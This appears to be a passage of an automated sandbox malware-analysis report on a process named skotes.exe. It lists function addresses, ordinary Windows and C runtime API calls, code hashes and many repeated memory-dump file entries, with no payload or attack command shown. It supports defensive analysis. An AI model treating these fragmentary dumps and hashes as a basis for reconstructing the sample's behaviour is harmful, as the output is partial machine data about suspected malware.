Instruction ID: a2ed62c3d820fffea4893df956f8fcb9f8621164b990707bbcbc6bf830ce9d05
Opcode Fuzzy Hash: e41e199e0be3c04a2cd1456cda1699463fb82d3b4ecc3d06643754e524fc2f8b
Instruction Fuzzy Hash: C6A1D271A01606AFDB20DF68D844B5AB7B8FF15314F14822EE815D7381EB31EA05CBD2

Function 008FCBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008FCC66

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: 66830eac64b3e933c7f2c078359d9bfe52be02c27eb107b05a36f775d19d28ad
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: E8B12532A0464D9FDB15DF38C9817BEBBE5FF45340F24416AEA55EB241D6348E01CB60

Function 008DBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 008DBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 008DBBE4
_xtime_get.LIBCPMT ref: 008DBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 008DBC13

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 2d1b1163f71e8c2b0543585ef151b157273a2bcfd37738d77d71ab8c8c96a61b
Instruction ID: 6ce2b03060353ed99f326dcd7d3ff3978216ff0e557e320ae0f0449bee2dcfe9
Opcode Fuzzy Hash: 2d1b1163f71e8c2b0543585ef151b157273a2bcfd37738d77d71ab8c8c96a61b
Instruction Fuzzy Hash: 2921F971A0011AAFDF00EBA8D881ABEB7B9FF48710F51451AF501E7351DB709D419BA1

Analysis Process: skotes.exePID: 2576, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1886
Total number of Limit Nodes:	9

Executed Functions

Function 00B5652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00B5652A,?,?,?,?,?,00B57661), ref: 00B56567

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ddb8e6b2aaf6b33485c80e683b7b8acf74235093f4af386517d57c5b3e2feae2
Instruction ID: 85e124c8722f5128f4d9aefaf67f1e03b80f2b4b09d0a58dd1d76ac9f64a1967
Opcode Fuzzy Hash: ddb8e6b2aaf6b33485c80e683b7b8acf74235093f4af386517d57c5b3e2feae2
Instruction Fuzzy Hash: 7DE04F30081108AACA256B15D849A483B9AEB6174AB401884FC0846122DB25FD55D640

Function 00B29BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 8cf6823413d7e6e800a2b0cd13050c057c23954c032b3e123a0251e6306498fb
Instruction ID: 25fbfda34205155a11afc879824ebf01105732fef9490259c5e812410fb5ad60
Opcode Fuzzy Hash: 8cf6823413d7e6e800a2b0cd13050c057c23954c032b3e123a0251e6306498fb
Instruction Fuzzy Hash: C5312831A04210DBEB089B78ED8976DBBE2EFC6320F248298E01C973D6C7759981C751

Function 00B29F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
